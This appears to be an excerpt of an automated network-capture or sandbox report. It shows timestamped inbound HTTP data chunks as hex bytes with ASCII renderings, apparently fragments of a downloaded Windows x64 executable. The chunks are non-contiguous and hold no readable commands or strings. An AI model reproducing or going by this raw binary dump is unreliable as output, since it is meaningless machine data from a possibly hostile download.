                                                                                                                                                                                2021-11-11 11:26:26 UTC6768INData Raw: 42 08 48 8b f9 49 8b d8 48 8b 08 e8 64 a2 fa ff 4c 8d 4c 24 38 4c 8d 44 24 48 48 8d 0d 43 05 06 00 8b d0 e8 5c a7 fe ff 85 c0 74 19 48 8b 54 24 48 48 8b cb e8 3b c7 fa ff 48 8b 4c 24 48 e8 11 04 fb ff eb 25 48 8b 07 45 33 c0 48 63 48 04 41 8d 50 01 48 03 cf e8 39 96 fa ff 48 8d 15 52 50 03 00 48 8b cb e8 0a c7 fa ff 33 c0 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b 42 08 49 8b d8 48 8b 08 e8 db a1 fa ff 4c 8d 4c 24 38 4c 8d 44 24 48 48 8d 0d ba 04 06 00 8b d0 e8 d3 a6 fe ff 85 c0 74 1f 48 8b cb e8 77 13 fa ff 8b 44 24 38 48 8b 4c 24 48 89 03 c7 43 08 01 00 00 00 e8 80 03 fb ff 33 c0 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 49 8b c8 49 8b f8 48 8b da e8 38 13 fa ff 83 27 00
                                                                                                                                                                                Data Ascii: BHIHdLL$8LD$HHC\tHT$HH;HL$H%HE3HcHAPH9HRPH3H\$0H _@SH HBIHLL$8LD$HHtHwD$8HL$HC3H [H\$WH IIH8'
                                                                                                                                                                                2021-11-11 11:26:26 UTC6769INData Raw: 83 ec 20 48 8b 42 08 49 8b d8 48 8b 08 e8 72 b7 ff ff 48 8b cb 48 8b f8 e8 17 10 fa ff 33 ed 89 2b c7 43 08 01 00 00 00 0f b7 07 66 3b c5 74 2d 0f b7 c8 e8 34 0e fb ff 3b c5 74 21 48 83 c7 02 66 8b 07 66 3b c5 75 e8 48 8b cb e8 e4 0f fa ff c7 43 08 01 00 00 00 c7 03 01 00 00 00 48 8b 5c 24 30 48 8b 6c 24 38 33 c0 48 83 c4 20 5f c3 cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 57 48 83 ec 20 48 8b 42 08 49 8b d8 48 8b 08 e8 f2 b6 ff ff 48 8b cb 48 8b f8 e8 97 0f fa ff 33 ed 89 2b c7 43 08 01 00 00 00 0f b7 07 66 3b c5 74 2d 0f b7 c8 e8 a8 0d fb ff 3b c5 74 21 48 83 c7 02 66 8b 07 66 3b c5 75 e8 48 8b cb e8 64 0f fa ff c7 43 08 01 00 00 00 c7 03 01 00 00 00 48 8b 5c 24 30 48 8b 6c 24 38 33 c0 48 83 c4 20 5f c3 cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 57
                                                                                                                                                                                Data Ascii: HBIHrHH3+Cf;t-4;t!Hff;uHCH\$0Hl$83H _H\$Hl$WH HBIHHH3+Cf;t-;t!Hff;uHdCH\$0Hl$83H _H\$Hl$W
                                                                                                                                                                                2021-11-11 11:26:26 UTC6785INData Raw: c3 cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 83 7a 10 02 48 8b 42 08 49 8b f0 72 1c 48 8b 48 08 48 8b 18 e8 57 77 ff ff 48 8b cb 48 8b f8 e8 4c 77 ff ff 48 8b d7 eb 0a 48 8b 08 e8 3f 77 ff ff 33 d2 48 8b c8 ff 15 dc ca 02 00 48 8b ce 8b d8 e8 da cf f9 ff 89 1e 48 8b 5c 24 30 c7 46 08 01 00 00 00 48 8b 74 24 38 33 c0 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 b8 20 00 01 00 e8 14 62 fc ff 48 2b e0 33 c0 49 8b d8 66 89 44 24 20 48 8b 42 08 48 8b 08 e8 db 76 ff ff 48 8d 54 24 20 41 b8 ff 7f 00 00 48 8b c8 ff 15 67 ca 02 00 48 8d 54 24 20 48 8b cb e8 aa 82 fa ff 33 c0 48 81 c4 20 00 01 00 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b 42 08 49 8b d8 48 8b 08 e8 77 5d fa ff 85 c0
                                                                                                                                                                                Data Ascii: H\$Ht$WH HzHBIrHHHWwHHLwHH?w3HHH\$0FHt$83H _@S bH+3IfD$ HBHvHT$ AHgHT$ H3H [H\$WH HBIHw]
                                                                                                                                                                                2021-11-11 11:26:27 UTC6786INData Raw: 00 e8 2e 4b fe ff 48 8b cf 48 8b d8 e8 23 cc f9 ff 48 89 1f 48 8b 5c 24 40 0f 28 74 24 20 c7 47 08 02 00 00 00 33 c0 48 83 c4 30 5f c3 cc cc cc cc cc cc cc 40 53 48 83 ec 30 48 8b 42 08 0f 29 74 24 20 49 8b d8 48 8b 08 e8 16 9b f9 ff e8 6d 10 fb ff 48 8b cb 66 0f 28 f0 e8 d5 cb f9 ff c7 43 08 03 00 00 00 f2 0f 11 33 33 c0 0f 28 74 24 20 48 83 c4 30 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 30 48 8b 5a 08 0f 29 74 24 20 49 8b f0 48 8b 0b e8 bd 54 fe ff 84 c0 74 3e 48 8b 4b 08 e8 b0 54 fe ff 84 c0 74 31 48 8b 4b 08 48 8b 1b e8 b0 59 fa ff 48 8b cb 8b f8 e8 a6 59 fa ff 48 8b ce 99 f7 ff 8b da e8 59 cb f9 ff c7 46 08 01 00 00 00 89 1e e9 84 00 00 00 48 8b 0b e8 63 eb fe ff 84 c0 74 40 48 8b 4b 08 e8 56 eb fe ff 84
                                                                                                                                                                                Data Ascii: .KHH#HH\$@(t$ G3H0_@SH0HB)t$ IHmHf(C33(t$ H0[H\$Ht$WH0HZ)t$ IHTt>HKTt1HKHYHYHYFHct@HKV
                                                                                                                                                                                2021-11-11 11:26:27 UTC6802INData Raw: cc cc cc cc 48 89 5c 24 08 55 56 57 48 83 ec 50 48 8b e9 b9 01 00 00 00 0f 29 74 24 40 49 8b f0 48 8b fa ff 15 53 86 02 00 48 8b ce 8b d8 e8 01 8c f9 ff 83 26 00 c7 46 08 01 00 00 00 48 8b 47 08 48 8b 08 e8 0b 2b fa ff 48 8b 08 48 89 4c 24 20 48 8b 48 08 48 89 4c 24 28 48 8b 48 10 48 89 4c 24 30 48 8b 40 18 48 8d 4c 24 20 48 89 44 24 38 ff 00 48 8b 54 24 28 48 ff ca e8 e4 32 f9 ff 66 83 38 5c 74 11 48 8d 15 f3 ce 02 00 48 8d 4c 24 20 e8 8d 29 fa ff 48 8b 4c 24 20 4c 8d 8c 24 80 00 00 00 4c 8d 84 24 88 00 00 00 48 8d 54 24 78 ff 15 1d 86 02 00 85 c0 74 28 66 0f ef f6 48 8b ce f2 48 0f 2a 74 24 78 f2 0f 59 35 2b 4e 03 00 e8 5e 8b f9 ff f2 0f 11 36 c7 46 08 03 00 00 00 eb 17 48 8b 45 00 45 33 c0 48 63 48 04 41 8d 50 01 48 03 cd e8 9a 0d fa ff 48 8d 4c 24 20
                                                                                                                                                                                Data Ascii: H\$UVWHPH)t$@IHSH&FHGH+HHL$ HHHL$(HHHL$0H@HL$ HD$8HT$(H2f8\tHHL$ )HL$ L$L$HT$xt(fHH*t$xY5+N^6FHEE3HcHAPHHL$
                                                                                                                                                                                2021-11-11 11:26:27 UTC6803INData Raw: 89 44 24 58 e8 db 32 ff ff 48 8d 15 34 23 03 00 48 8d 4c 24 40 e8 7a 34 fe ff 33 db 3a c3 74 11 48 8d 15 2d 23 03 00 48 8d 4c 24 40 e8 a3 15 fa ff 48 8d 15 2c 23 03 00 48 8d 4c 24 40 e8 52 34 fe ff 3a c3 75 19 48 8d 15 07 23 03 00 48 8d 4c 24 40 e8 3d 34 fe ff 3a c3 0f 84 f6 00 00 00 48 8b ce ff 15 64 82 02 00 83 f8 05 0f 85 e4 00 00 00 48 8d 15 64 f0 02 00 48 8d 4c 24 20 e8 a2 2a f9 ff 48 8d 54 24 60 48 8d 4c 24 20 e8 a3 54 f9 ff 48 8d 15 dc 22 03 00 48 8d 4c 24 20 e8 82 25 fa ff 48 8b 4c 24 20 45 33 c9 45 33 c0 33 d2 ff 15 77 8c 02 00 3b c3 75 7f 48 8d 15 ec 22 03 00 48 8d 4c 24 20 e8 0a 15 fa ff 48 8d 54 24 40 48 8d 4c 24 20 e8 5b 54 f9 ff 48 8d 15 ec 22 03 00 48 8d 4c 24 20 e8 3a 25 fa ff 48 8b 4c 24 20 45 33 c9 45 33 c0 33 d2 ff 15 2f 8c 02 00 3b c3
                                                                                                                                                                                Data Ascii: D$X2H4#HL$@z43:tH-#HL$@H,#HL$@R4:uH#HL$@=4:HdHdHL$ *HT$`HL$ TH"HL$ %HL$ E3E33w;uH"HL$ HT$@HL$ [TH"HL$ :%HL$ E3E33/;
                                                                                                                                                                                2021-11-11 11:26:27 UTC6819INData Raw: 8b d3 48 8b cd e8 6a 02 fd ff 48 8d 4c 24 20 0f b7 10 e8 bd 05 f9 ff 48 ff c3 48 3b de 72 ac 4c 8d 44 24 20 48 8b d7 49 8b cc e8 f5 fd ff ff 48 8b f8 48 85 c0 74 0c 48 ff c3 48 3b de 0f 82 4c ff ff ff 48 8d 4c 24 20 e8 b7 f3 f8 ff 48 8b c7 48 8b 5c 24 60 48 8b 6c 24 68 48 8b 74 24 70 48 83 c4 40 41 5d 41 5c 5f c3 cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 48 8b f2 48 8b e9 e8 a1 fe ff ff 48 8b d8 48 85 c0 74 4f 48 8b ce 33 ff e8 cf f0 fc ff be 0a 11 00 00 84 c0 75 16 48 8b 4d 00 44 8d 47 04 4c 8b cb 8b d6 ff 15 fb 49 02 00 48 8b d8 48 85 db 74 1f 48 8b 4d 00 4c 8b cb 41 b8 01 00 00 00 8b d6 ff c7 ff 15 dc 49 02 00 48 8b d8 48 85 c0 75 e1 8b c7 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3
                                                                                                                                                                                Data Ascii: HjHL$ HH;rLD$ HIHHtHH;LHL$ HH\$`Hl$hHt$pH@A]A\_H\$Hl$Ht$WH HHHHtOH3uHMDGLIHHtHMLAIHHuH\$0Hl$8Ht$@H _
                                                                                                                                                                                2021-11-11 11:26:27 UTC6820INData Raw: c8 38 fa ff 49 8b 0c 24 8d 56 0d 4c 8b c8 4c 8b c3 48 8b e8 ff 15 a2 46 02 00 48 3b c6 74 23 39 7c 24 60 74 09 8b 4c 24 60 66 89 74 4d 00 8b 44 24 68 49 8b cd 48 8d 54 45 00 e8 95 d1 f9 ff 40 b6 01 48 8b cd e8 0a 34 fa ff 40 8a c6 eb 02 32 c0 48 8b 5c 24 50 48 83 c4 20 41 5d 41 5c 5f 5e 5d c3 cc cc 48 89 5c 24 18 4c 89 4c 24 20 55 56 57 41 54 41 55 41 56 41 57 b8 20 11 00 00 e8 21 d6 fb ff 48 2b e0 33 ed 44 8b f2 4d 8b e1 41 c1 ee 0b 8b da 4c 8b e9 41 83 e6 01 c7 84 24 60 11 00 00 01 00 00 00 89 ac 24 68 11 00 00 8b fd 48 89 4c 24 70 4c 3b cd 0f 84 84 00 00 00 4c 8b bc 24 80 11 00 00 49 89 29 4c 3b fd 75 0c 8d 5d 10 89 9c 24 68 11 00 00 eb 5d 48 8d 05 54 9a 02 00 41 89 2f 48 89 84 24 90 00 00 00 48 8d 05 42 9b 02 00 48 89 84 24 98 00 00 00 48 8d 05 33 9c
                                                                                                                                                                                Data Ascii: 8I$VLLHFH;t#9|$`tL$`ftMD$hIHTE@H4@2H\$PH A]A\_^]H\$LL$ UVWATAUAVAW !H+3DMALA$`$hHL$pL;L$I)L;u]$h]HTA/H$HBH$H3
                                                                                                                                                                                2021-11-11 11:26:27 UTC6836INData Raw: 05 b7 a1 02 00 4c 8d 15 08 a2 02 00 48 89 44 24 40 48 8d 05 d4 a1 02 00 48 8d 8e d4 01 00 00 48 89 44 24 58 48 8d 86 c9 01 00 00 48 8d 15 aa a1 02 00 48 89 44 24 60 48 8d 05 de a1 02 00 48 89 4c 24 48 48 89 44 24 70 48 8d 86 ca 01 00 00 48 8d 0d 1e a3 02 00 48 89 44 24 78 48 8d 05 e2 a1 02 00 4c 8d 05 fb a1 02 00 48 89 84 24 88 00 00 00 48 8d 05 7c f3 04 00 bd 01 00 00 00 48 89 84 24 90 00 00 00 48 8d 05 e0 a1 02 00 45 33 e4 48 89 84 24 a0 00 00 00 48 8d 05 5a f3 04 00 89 6f 08 48 89 84 24 a8 00 00 00 48 8d 05 dc a1 02 00 44 89 27 48 89 84 24 b8 00 00 00 48 8d 05 46 f3 04 00 48 89 54 24 50 48 89 84 24 c0 00 00 00 48 8d 05 e6 a1 02 00 4c 89 54 24 68 48 89 84 24 c8 00 00 00 48 8d 05 e2 a1 02 00 4c 89 94 24 80 00 00 00 48 89 84 24 d0 00 00 00 48 8d 05 03 f3
                                                                                                                                                                                Data Ascii: LHD$@HHHD$XHHHD$`HHL$HHD$pHHHD$xHLH$H|H$HE3H$HZoH$HD'H$HFHT$PH$HLT$hH$HL$H$H
                                                                                                                                                                                2021-11-11 11:26:27 UTC6837INData Raw: 89 84 24 98 02 00 00 48 8d 05 76 f2 04 00 48 89 84 24 a0 02 00 00 48 8d 05 c7 a1 02 00 48 89 84 24 b0 02 00 00 48 8d 86 00 05 00 00 48 89 84 24 b8 02 00 00 49 8b 5f 08 48 8d 05 cd a1 02 00 4c 89 94 24 c0 02 00 00 48 8b 0b 48 89 84 24 c8 02 00 00 48 8d 86 01 05 00 00 48 89 84 24 d0 02 00 00 48 8d 05 cc a1 02 00 4c 89 94 24 d8 02 00 00 48 89 84 24 e0 02 00 00 48 8d 86 fc 04 00 00 4c 89 a4 24 00 03 00 00 48 89 84 24 e8 02 00 00 48 8d 05 c6 a1 02 00 4c 89 8c 24 20 03 00 00 48 89 84 24 f0 02 00 00 48 8d 05 bf a1 02 00 48 89 84 24 f8 02 00 00 48 8d 05 d8 a1 02 00 48 89 84 24 08 03 00 00 48 8d 05 d9 a1 02 00 48 89 84 24 10 03 00 00 48 8d 86 2c 05 00 00 48 89 84 24 18 03 00 00 e8 4d 88 fd ff 41 3a c4 75 07 8b d5 e9 44 06 00 00 b8 2a 00 00 00 66 41 39 06 74 ee 4c
                                                                                                                                                                                Data Ascii: $HvH$HH$HH$I_HL$HH$HH$HL$H$HL$H$HL$ H$HH$HH$HH$H,H$MA:uD*fA9tL
                                                                                                                                                                                2021-11-11 11:26:27 UTC6853INData Raw: ff 48 8d 15 94 fe 01 00 48 8d 4c 24 30 e8 82 6c fd ff 84 c0 74 1d 48 8b 4c 24 50 0f ba af 10 01 00 00 07 e8 90 bd f9 ff 89 87 b4 01 00 00 e9 4d fe ff ff 48 8d 15 66 fe 01 00 48 8d 4c 24 30 e8 50 6c fd ff 84 c0 74 1d 48 8b 4c 24 50 0f ba af 10 01 00 00 08 e8 5e bd f9 ff 89 87 b8 01 00 00 e9 1b fe ff ff 48 8d 15 38 fe 01 00 48 8d 4c 24 30 e8 1e 6c fd ff 84 c0 74 1d 48 8b 4c 24 50 0f ba af 10 01 00 00 09 e8 2c bd f9 ff 89 87 bc 01 00 00 e9 e9 fd ff ff 48 8d 15 0e fe 01 00 48 8d 4c 24 30 e8 ec 6b fd ff 84 c0 74 1c 48 8b 4c 24 50 83 8f 10 01 00 00 02 e8 fb bc f9 ff 89 87 9c 01 00 00 e9 b8 fd ff ff 48 8d 15 f5 fd 01 00 48 8d 4c 24 30 e8 bb 6b fd ff 84 c0 74 1d 83 8f 10 01 00 00 04 48 8d 8f 78 01 00 00 48 8d 54 24 50 e8 ff 6a f9 ff e9 86 fd ff ff 48 8d 15 b3 fb
                                                                                                                                                                                Data Ascii: HHL$0ltHL$PMHfHL$0PltHL$P^H8HL$0ltHL$P,HHL$0ktHL$PHHL$0ktHxHT$PjH
                                                                                                                                                                                2021-11-11 11:26:27 UTC6854INData Raw: b8 f9 ff ba 23 00 00 00 48 8b cb e8 c4 79 f8 ff 48 8d 54 24 70 48 8b cb e8 07 5a f9 ff eb 22 48 8b 8c 24 30 01 00 00 4c 8d 44 24 50 48 8b d6 e8 d0 70 ff ff 48 8d 54 24 50 48 8b cb e8 f3 88 f8 ff 4c 8b 84 24 40 01 00 00 48 8b 94 24 48 01 00 00 48 8b 8c 24 30 01 00 00 83 64 24 28 00 4c 8b cb 40 88 6c 24 20 e8 c9 fe ff ff 84 c0 75 49 48 8d 54 24 30 48 8b cb e8 78 67 f9 ff 48 3b b4 24 40 01 00 00 74 55 48 8b 84 24 30 01 00 00 4c 8b ce 4c 8b c7 48 8b 08 ba 0a 11 00 00 ff 15 1a be 01 00 01 bc 24 38 01 00 00 48 8b f0 48 85 c0 0f 85 e7 fe ff ff 40 32 ff 48 8d 4c 24 50 e8 42 67 f8 ff 48 8d 4c 24 30 e8 38 67 f8 ff 40 8a c7 48 81 c4 08 01 00 00 5f 5e 5d 5b c3 48 8b cb e8 91 64 fc ff 84 c0 75 0f 48 8d 15 b6 f8 01 00 48 8b cb e8 2e 59 f9 ff 40 84 ed 74 33 8b 8c 24 38
                                                                                                                                                                                Data Ascii: #HyHT$pHZ"H$0LD$PHpHT$PHL$@H$HH$0d$(L@l$ uIHT$0HxgH;$@tUH$0LLH$8HH@2HL$PBgHL$08g@H_^][HduHH.Y@t3$8
                                                                                                                                                                                2021-11-11 11:26:27 UTC6870INData Raw: 48 3b c7 0f 84 26 ff ff ff 45 33 c9 45 33 c0 83 ca ff 48 8b ce ff 15 c9 7a 01 00 44 8d 60 ff 44 3b e7 7e 41 4c 8d 84 24 80 00 00 00 41 b9 04 01 00 00 8b d7 48 8b ce ff 15 a7 7a 01 00 48 8d 94 24 80 00 00 00 48 8d 4c 24 20 e8 d5 19 f9 ff 48 8d 4c 24 20 ba 0a 00 00 00 e8 76 39 f8 ff ff c7 41 3b fc 7c bf 4c 8d 84 24 80 00 00 00 41 b9 04 01 00 00 8b d7 48 8b ce ff 15 66 7a 01 00 48 8d 94 24 80 00 00 00 48 8d 4c 24 20 e8 94 19 f9 ff 48 8d 54 24 20 48 8b cd e8 77 32 f9 ff 48 8b ce ff 15 96 76 01 00 4c 8b 1b 45 33 c0 49 63 4b 04 41 8d 50 01 48 03 cb e8 78 fd f8 ff eb 24 ff 15 90 7e 01 00 45 33 c0 3b c7 48 8b 03 41 8d 50 02 48 63 48 04 75 04 41 8d 50 01 48 03 cb e8 b2 fd f8 ff ff 15 74 7e 01 00 48 8d 4c 24 20 e8 12 27 f8 ff 4c 8d 9c 24 90 02 00 00 33 c0 49 8b 5b
                                                                                                                                                                                Data Ascii: H;&E3E3HzD`D;~AL$AHzH$HL$ HL$ v9A;|L$AHfzH$HL$ HT$ Hw2HvLE3IcKAPHx$~E3;HAPHcHuAPHt~HL$ 'L$3I[
                                                                                                                                                                                2021-11-11 11:26:27 UTC6871INData Raw: 01 00 00 00 75 15 48 8b 42 08 48 8b 48 10 e8 61 06 f9 ff 41 8a ed 41 3b c4 75 03 41 8a ec 48 8b 47 08 48 8b 08 e8 2a 17 f9 ff 48 8d 15 73 bf 01 00 48 8b c8 e8 5b 24 fd ff 41 3a c4 0f 85 8b 02 00 00 83 be 48 01 00 00 02 0f 85 f2 00 00 00 48 8b 47 08 48 8b 08 e8 29 1f fe ff 48 8d 4c 24 40 48 8b d0 e8 d8 6b f9 ff 41 be 5c 00 00 00 48 8d 4c 24 40 41 8b d6 e8 f1 84 f9 ff 49 3b c4 75 3b 48 8b 96 90 01 00 00 48 8d 4c 24 40 e8 af 6b f9 ff 48 8d 15 e8 ba 01 00 48 8d 4c 24 40 e8 72 6b f9 ff 4c 8b 5f 08 49 8b 0b e8 d6 1e fe ff 48 8d 4c 24 40 48 8b d0 e8 59 6b f9 ff 48 8b 47 08 48 8b 48 08 e8 bc 1e fe ff 48 8d 8c 24 50 02 00 00 48 8b d0 e8 68 6b f9 ff 48 8d 8c 24 50 02 00 00 e8 cf 0b fc ff 41 3a c4 74 2c 48 8d 8c 24 50 02 00 00 e8 41 67 f9 ff 66 44 39 b4 44 4e 02 00
                                                                                                                                                                                Data Ascii: uHBHHaAA;uAHGH*HsH[$A:HHGH)HL$@HkA\HL$@AI;u;HHL$@kHHL$@rkL_IHL$@HYkHGHHH$PHhkH$PA:t,H$PAgfD9DN
                                                                                                                                                                                2021-11-11 11:26:27 UTC6887INData Raw: bd 00 00 00 4d 3b fe 75 13 48 8d 0d 7c 28 04 00 e8 ef 8c fb ff 33 c0 e9 e2 02 00 00 48 8d 0d d1 27 04 00 49 8b d7 83 f5 40 c7 47 18 40 00 00 00 e8 4f 9b fb ff 41 3b c6 7c 18 48 63 c8 48 8b 05 50 28 04 00 48 8b 0c c8 48 8b 01 c7 40 18 00 00 00 80 48 8d 54 24 60 49 8b cf ff 15 74 3a 01 00 48 8d 54 24 70 49 8b cf ff 15 a6 39 01 00 b9 07 00 00 00 ff 15 a3 37 01 00 8b 4c 24 68 2b 4c 24 78 2b c8 44 03 e9 b9 08 00 00 00 44 89 ac 24 d0 00 00 00 ff 15 83 37 01 00 8b 4c 24 6c 2b 4c 24 7c 2b c8 8b c3 44 03 e1 b9 00 00 c0 00 23 c1 3b c1 75 0e b9 04 00 00 00 ff 15 5e 37 01 00 44 03 e0 44 8b b4 24 e0 00 00 00 44 8b ac 24 e8 00 00 00 b8 90 01 00 00 41 83 fe ff 44 0f 44 f0 41 83 fd ff 44 0f 44 e8 83 bc 24 d0 00 00 00 ff 75 3e 33 d2 4c 8d 44 24 60 45 33 c9 8d 4a 30 ff 15
                                                                                                                                                                                Data Ascii: M;uH|(3H'I@G@OA;|HcHP(HH@HT$`It:HT$pI97L$h+L$x+DD$7L$l+L$|+D#;u^7DD$D$ADDADD$u>3LD$`E3J0
                                                                                                                                                                                2021-11-11 11:26:27 UTC6888INData Raw: ba 00 00 00 48 8b 53 08 83 64 24 78 00 83 64 24 68 00 48 8d 4c 24 20 e8 48 04 f8 ff 48 8d 4c 24 20 e8 0e bd fc ff 84 c0 75 23 48 8d 4c 24 20 e8 40 c2 f8 ff 48 8d 4c 24 20 8d 58 ff e8 f3 33 f8 ff c7 44 24 28 01 00 00 00 89 5c 24 20 49 8b 44 24 08 48 8b 08 e8 7a af fb ff 4c 8d 4c 24 68 4c 8d 44 24 78 48 8d 54 24 20 48 8b c8 e8 23 dd fd ff 48 8b cf 48 8b d8 48 85 c0 75 27 e8 b3 33 f8 ff 21 1f 8b 54 24 68 c7 47 08 01 00 00 00 48 8b 45 00 45 33 c0 48 63 48 04 48 03 cd e8 f3 b5 f8 ff eb 0f e8 8c 33 f8 ff c7 47 08 07 00 00 00 48 89 1f 48 8d 4c 24 20 e8 78 33 f8 ff eb 1e 48 8b 0b e8 0e af fb ff 48 8b cf 48 8b 58 10 e8 62 33 f8 ff c7 47 08 07 00 00 00 48 89 1f 33 c0 48 8b 5c 24 60 48 83 c4 40 41 5c 5f 5d c3 cc cc cc cc cc cc cc cc 48 8b c4 48 89 58 08 55 56 57 41
                                                                                                                                                                                Data Ascii: HSd$xd$hHL$ HHL$ u#HL$ @HL$ X3D$(\$ ID$HzLL$hLD$xHT$ H#HHHu'3!T$hGHEE3HcHH3GHHL$ x3HHHXb3GH3H\$`H@A\_]HHXUVWA
                                                                                                                                                                                2021-11-11 11:26:27 UTC6904INData Raw: 10 00 00 00 49 8b cd e8 56 e0 f8 ff 3b c7 75 24 e8 1d e0 f8 ff 45 33 c0 8b d0 49 8b 04 24 48 63 48 04 49 03 cc e8 6a 76 f8 ff 49 8b cd e8 2a e0 f8 ff eb 9e 45 33 c9 44 8b c5 33 d2 48 8b ce e8 b0 8d f8 ff 48 8b c8 48 8b d8 e8 e5 f3 f7 ff 44 8b cd 44 8b c5 33 d2 48 8b ce 89 6b 08 c7 03 d1 94 b5 02 e8 8c 8d f8 ff 48 8b c8 48 8b d8 e8 c1 f3 f7 ff 45 8b cf 44 8b c5 33 d2 48 8b ce 89 6b 08 44 89 2b e8 6b 8d f8 ff 49 8b 4e 08 48 8b 09 48 8b d8 e8 bc 92 f8 ff 48 8b cb 48 8b d0 e8 71 aa f8 ff 41 b9 03 00 00 00 44 8b c5 33 d2 48 8b ce e8 3e 8d f8 ff 49 8b 4e 08 48 8b 49 08 48 8b d8 e8 8e 92 f8 ff 48 8b cb 48 8b d0 e8 43 aa f8 ff 48 8b 5c 24 60 48 8b 6c 24 68 48 8b 74 24 70 33 c0 48 83 c4 30 41 5f 41 5e 41 5d 41 5c 5f c3 cc cc cc cc 48 89 5c 24 08 55 56 57 41 54 41
                                                                                                                                                                                Data Ascii: IV;u$E3I$HcHIjvI*E3D3HHHDD3HkHHED3HkD+kINHHHHqAD3H>INHIHHHCH\$`Hl$hHt$p3H0A_A^A]A\_H\$UVWATA
                                                                                                                                                                                2021-11-11 11:26:27 UTC6905INData Raw: ff 48 8d 4c 24 40 e8 f9 9b f7 ff eb 20 8b d5 49 8b cd 45 3b e7 75 03 49 8b ce e8 e5 94 fd ff 4c 8b c3 48 8b d6 48 8b c8 e8 d7 dc f8 ff 48 8b ce e8 1f e0 f8 ff 33 c0 48 8b 9c 24 d0 02 00 00 48 81 c4 90 02 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 54 41 55 48 83 ec 40 48 8b 42 08 45 33 c9 48 8b e9 48 8b 08 45 8d 69 01 49 8b f0 4c 8b e2 45 8b c5 41 8b d5 e8 66 89 f8 ff 48 85 c0 75 25 48 8b ce e8 99 ef f7 ff 83 26 00 44 89 6e 08 48 8b 45 00 45 33 c0 48 63 48 04 48 03 cd 83 ca ff e9 1f 01 00 00 48 8b c8 e8 b4 7d f8 ff 3d d1 94 b5 02 74 19 48 8b ce e8 65 ef f7 ff 83 26 00 44 89 6e 08 ba fe ff ff ff e9 e9 00 00 00 49 8b 44 24 08 41 b9 03 00 00 00 45 8b c5 48 8b 38 41 8b d5 48 8b cf e8 f8 88 f8 ff 48 8b c8
                                                                                                                                                                                Data Ascii: HL$@ IE;uILHHH3H$HA_A^A]A\_^]H\$Hl$Ht$WATAUH@HBE3HHEiILEAfHu%H&DnHEE3HcHHH}=tHe&DnID$AEH8AHH
                                                                                                                                                                                2021-11-11 11:26:27 UTC6921INData Raw: 44 8b 74 24 3c eb 0b 48 8b ce e8 65 3e f8 ff 44 8b f0 49 83 ff 07 0f 82 ab 00 00 00 49 8b 4d 08 48 8b 49 30 e8 4b 3e f8 ff 8b f0 83 f8 ff 0f 84 93 00 00 00 85 c0 7e 05 83 f8 64 7e 05 be 0a 00 00 00 8b 54 24 38 8b 84 24 98 00 00 00 44 8b 44 24 3c 89 54 24 30 44 89 84 24 a8 00 00 00 3b c2 75 05 45 3b f0 74 6a 48 8d 8c 24 a8 00 00 00 41 b9 01 00 00 00 44 8b c6 48 89 4c 24 28 48 8d 4c 24 30 41 8b d6 48 89 4c 24 20 8b c8 e8 b3 3b fb ff 84 c0 74 4f 44 8b 84 24 a8 00 00 00 8b 54 24 30 48 8b 8b 50 03 00 00 45 8b cc 89 6c 24 20 e8 40 68 fb ff b9 32 00 00 00 e8 c6 3a fb ff 8b 84 24 98 00 00 00 eb a0 8b 94 24 98 00 00 00 45 8b c6 48 8b 8b 50 03 00 00 45 8b cc 89 6c 24 20 e8 10 68 fb ff 48 8b 83 50 03 00 00 48 8b cf 48 8b 18 e8 3e af f7 ff c7 47 08 07 00 00 00 48 89
                                                                                                                                                                                Data Ascii: Dt$<He>DIIMHI0K>~d~T$8$DD$<T$0D$;uE;tjH$ADHL$(HL$0AHL$ ;tOD$T$0HPEl$ @h2:$$EHPEl$ hHPHH>GH
                                                                                                                                                                                2021-11-11 11:26:27 UTC6922INData Raw: 03 00 48 3b c3 0f 84 66 01 00 00 44 8d 73 03 89 50 58 66 44 89 70 50 66 44 89 b0 e0 00 00 00 ff 15 bf a7 00 00 4c 8b 05 d8 90 03 00 48 8d 0d b1 b0 03 00 41 89 80 e8 00 00 00 66 45 89 b0 f8 00 00 00 8b 97 c0 01 00 00 e8 f7 52 fb ff 41 89 80 00 01 00 00 4c 3b eb 0f 84 a1 00 00 00 8d 43 08 49 8d 88 98 00 00 00 48 8d 54 24 20 66 89 44 24 20 49 8b 45 08 48 89 44 24 28 ff 15 dc a9 00 00 48 8b 0d 7d 90 03 00 4d 8b 5d 10 48 8d 54 24 20 48 83 e9 80 4c 89 5c 24 28 ff 15 bd a9 00 00 48 8b 0d 5e 90 03 00 4d 8b 5d 18 48 8d 54 24 20 48 81 c1 b0 00 00 00 4c 89 5c 24 28 ff 15 9b a9 00 00 48 8b 0d 3c 90 03 00 66 44 89 b1 c8 00 00 00 41 8b 45 20 66 44 89 b1 10 01 00 00 89 81 d0 00 00 00 41 0f b7 45 00 66 3b c3 0f b7 c0 75 04 41 8b 45 38 3b c3 89 81 18 01 00 00 0f 45 f0 4c
                                                                                                                                                                                Data Ascii: H;fDsPXfDpPfDLHAfERAL;CIHT$ fD$ IEHD$(H}M]HT$ HL\$(H^M]HT$ HL\$(H<fDAE fDAEf;uAE8;EL
